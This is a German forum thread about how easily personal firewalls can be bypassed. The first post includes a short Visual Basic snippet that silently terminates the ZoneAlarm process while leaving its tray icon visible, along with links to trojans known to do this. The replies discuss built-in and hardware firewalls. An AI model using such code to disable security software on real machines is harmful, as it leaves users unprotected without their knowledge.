ComputerBase Menü
Aktuelles

Soviel zur sicherheit von Privat Firewalls

Limbus

Limbus

Rail God
Registriert
März 2001
Beiträge
138
Moin,
da eine Firewall als ganz normales Programm auf Eurem Computer läuft, ist es überhaupt kein Problem für einen Trojaner, die Firewall auszuschalten bzw. seine eigene Netzverbindung mitzubringen, die von der Firewall nicht entdeckt werden kann. Erste Viren und Trojaner, die dies auch praktizieren sind schon länger bekannt und es sollte auch schon weitere unbekannte geben:

http://www.chip.de/news_stories/news_stories_219093.html
http://www.symantec.com/avcenter/venc/data/w32.magistr.39921@mm.html
http://www.astonsoft.com/optix.htm
http://www.mischel.dhs.org/bionet312analysis.asp
http://www.y3knetwork.org/
http://www.mischel.dhs.org/buschtrommel100analysis.asp

Es gibt sicherlich noch weitere.

Wie einfach es ist, eine PF auszuschalten, zeigt dieser einfache VB Script der Zone Alarm ohne Warnmeldung beendet.


Code: 
Option Explicit
        Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject
          Asv Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess
          As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal
          dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal
          dwProcessId As Long) As Long
Const PROCESS_TERMINATE = &H1
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal
          hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA"
          (ByVal lpClassName As String, ByVal lpWindowName As String) As
          Long
Private Sub Close_ZoneAlarm()
Dim xhwnd As Long
Dim pwid As Long
xhwnd = FindWindow(vbNullString, "ZoneAlarm")
GetWindowThreadProcessId xhwnd, pwid
Dim Task As Long, result As Long
Task = OpenProcess(PROCESS_TERMINATE, 0&, pwid)
TerminateProcess Task, 1&
CloseHandle Task
End Sub


Lässt sich mit beliebeiger anderer PF machen. Das schöne ist aber, dass das Tray Icon erhalten bleibt, bis man mit der Maus drüber fährt.

Gruss Limbus
 
Die Firewall auf meinem Rechner läuft aber nicht als ganz normales Programm sonder ist im Browser und im OS integriert. Möchte wissen ob sie da auch so leicht zu umgehen ist.
Na was meinst du?
 
Moin,
wenn Du glaubst, dass ein Firewall sicher ist, wenn er im OS integriert ist, dann täuscht Du Dich aber gewaltig. Vorallem wenn es sich um eine MS OS handelt. Der IE ist auch im OS integreirt und hat Ihn deswegen noch lange nicht vor Sicherheitslücken in rauhen Mengen geschützt.

Ich weiss auch nicht, wie diese PF verhindern soll, das der Trojaner seine eigene Netzwerkschnittstelle mitbringt, die dann von der PF gar nicht überwacht wird.

Die PF unter XP wird wohl auch "nur" als "normaler" Dienst laufen und lässt sich somit auch ausknipsen.

Ich glaube allerdings nicht, das die PF im Browser integriert ist und wenn das so währe, sind dann andere Programme bzw. Browser nicht geschützt?

Das Problem einer Firewall, die nicht auf einem eigenen Rechner Läuft ist immer der User, der daran rumfummeln kann und wird. Wenn ein Programm nicht mehr läuft, wird ganz schnell alles Freigegeben.

Ich würde mich nicht auf eine PF verlassen, schon gar nicht wenn Sie von M$ kommt und man seienn Rechner auch so dicht machen kann.

Gruss Limbus
 
Original erstellt von Limbus
Das Problem einer Firewall, die nicht auf einem eigenen Rechner Läuft ist immer der User, der daran rumfummeln kann und wird. Wenn ein Programm nicht mehr läuft, wird ganz schnell alles Freigegeben.
Zum Vergrößern anklicken....

Sehr gute Argument. :daumen:
So sicher bin ich mit meinem Firewall auch nicht.
Deswegen hab ich ja alles auf blockieren und überwachen gestellt.
Es ist nur ca. 6 Programmen zugelassen eine Verbindung mit Internet zu haben. :rolleyes:
Dafür wird aber alles in Protokoll geschrieben. :D
Und da kann man schon prüfen welcher Depp Blödsinn macht.
Aber am besten ist kein Netzzugang zu haben. :lol:
Ist am sichersten. :rolleyes:
 
Die "Firewall" in XP ist auch schon in 2000 integriert, man sperrt einfach unter den Eigenschaften von TCP/IP die zum surfen nicht benötigten ports, soviel zu der "Firewall" von XP und 2k
 
Eine weitere gute lösung ist es, einen Router mit einer Hardware-Firewall zu verwenden. Die kann man nur schwierig umgehen!
 
Original erstellt von Limbus
Moin,
wenn Du glaubst, dass ein Firewall sicher ist, wenn er im OS integriert ist, dann täuscht Du Dich aber gewaltig.
Zum Vergrößern anklicken....

Hab ich nie behauptet, noch schlimmer ich hab es nichtmal zu hoffen gewagt dass sie sicher sein könnte. Ich weiß doch auch dass man bei Microsoft keine Ansprüche stellen darf und schon garkeine die Sicherheit im Bezug aufs Internet betreffen. War nur eine Frage an einen der sich anscheinen mit PS viel besser auskennt als ich.
 
Du musst dich einloggen oder registrieren, um hier zu antworten.

Ähnliche Themen

cumulonimbus8
Denkfehler oder Windows(10)? MinimizedNoFocus
2
Antworten
21
Aufrufe
1.104
cumulonimbus8
cumulonimbus8
B
Excel 2016 VBA Fenstergröße an Bildschirm automatisch anpassen
Antworten
11
Aufrufe
10.822
Bermont
B
Rexus
VisualBasic COM Port öffnen (Kernel32 lib)
Antworten
13
Aufrufe
5.580
ModellbahnerTT
M
cumulonimbus8
Word VBA SendKeys ersetzen - oder: 3x Entf auslösen
Antworten
2
Aufrufe
1.316
cumulonimbus8
cumulonimbus8
B
VisualBasic Ordner mit Unterordner erstellen lassen
Antworten
3
Aufrufe
1.340
Boncer
B
Zurück
Oben

Willkommen auf ComputerBase!

Mit Werbung weiterlesen

Besuche ComputerBase wie gewohnt mit Werbung und Tracking. Die Zustimmung ist jederzeit widerrufbar.

Details im Privacy Center und in der Liste unserer Partner. Ein Widerruf ist möglich in der Datenschutzerklärung.

… oder ComputerBase Pro bestellen

Nutze ComputerBase ohne Werbebanner, Video-Ads und Werbetracking schon für 4 €/Monat oder 36 €/Jahr.

Mehr zu ComputerBase Pro

Bereits Pro-Nutzer? Hier anmelden.

Tracking: Wir und unsere 165 Partner verarbeiten personenbezogene Daten, indem wir mit auf Ihrem Gerät gespeicherten Informationen (z. B. eindeutige Kennungen in Cookies) ein Nutzungsprofil erstellen, um z. B. Anzeigen zu personalisieren. Verarbeitungszwecke: Genaue Standortdaten und Abfrage von Geräteeigenschaften zur Identifikation, Informationen auf einem Gerät speichern und/oder abrufen, Personalisierte Anzeigen und Inhalte, Anzeigen- und Inhaltsmessungen, Erkenntnisse über Zielgruppen und Produktentwicklungen.

Impressum Kontakt Datenschutz